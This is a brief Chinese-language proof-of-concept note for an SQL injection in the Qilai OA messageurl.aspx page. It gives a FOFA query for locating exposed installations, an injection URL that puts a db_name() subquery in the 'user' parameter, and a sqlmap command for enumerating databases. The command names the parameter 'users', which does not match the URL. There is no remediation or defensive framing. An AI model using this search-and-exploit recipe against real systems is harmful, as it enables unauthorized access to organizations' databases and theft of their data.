# 啟萊OA messageurl.aspx SQL注入漏洞
==FOFA==
app="启莱OA"
存在SQL注入的文件為 messageurl.aspx
http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
==SQLMAP==
sqlmap -u "http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1" -p users --dbs
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容